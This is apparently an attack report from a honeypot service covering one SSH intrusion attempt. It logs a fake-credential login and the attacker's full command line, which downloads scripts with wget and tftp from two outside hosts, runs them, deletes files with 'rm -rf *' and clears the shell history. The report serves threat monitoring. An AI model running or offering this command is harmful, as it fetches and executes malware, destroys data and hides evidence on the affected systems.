Report of Attack 45.128.232.62 (62.232.128.45.in-addr.arpa) ssh observation

Header

Time	2023/05/17, 10:32:12 (GMT)
Transaction ID	1M5U5JL32RCB28SU
Service	ssh
Location	NL (Netherlands)
Attacker	45.128.232.62
Classification	Web script execution
Harm Potential	High

Description

Script execution method downloaded from the www (web)

Content

45.128.232.62 client username 'fake' and password 'fake' entered
45.128.232.62 client command : 'cd /tmp || cd /run || cd /; wget http://45.128.232.62/Nekobins.sh; chmod 777 Nekobins.sh; sh Nekobins.sh; tftp 107.189.12.79 -c get Nekotftp1.sh; chmod 777 Nekotftp1.sh; sh Nekotftp1.sh; tftp -r Nekotftp2.sh -g 107.189.12.79; chmod 777 Nekotftp2.sh; sh Nekotftp2.sh; rm -rf Nekobins.sh Nekotftp1.sh Nekotftp2.sh; rm -rf *; history -c; rm -rf ~/.bash_history'

All observations are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin

If you like, you can support
with your donations to us..

Donate

Attack Report for Observation

Header

Time

2023/05/17, 10:32:12 (GMT)

Transaction ID

1M5U5JL32RCB28SU

Service

ssh

Location

NL (Netherlands)

Attacker

45.128.232.62

Classification

Web script execution

Harm Potential

High

Description

Script execution method downloaded from the www (web)

Content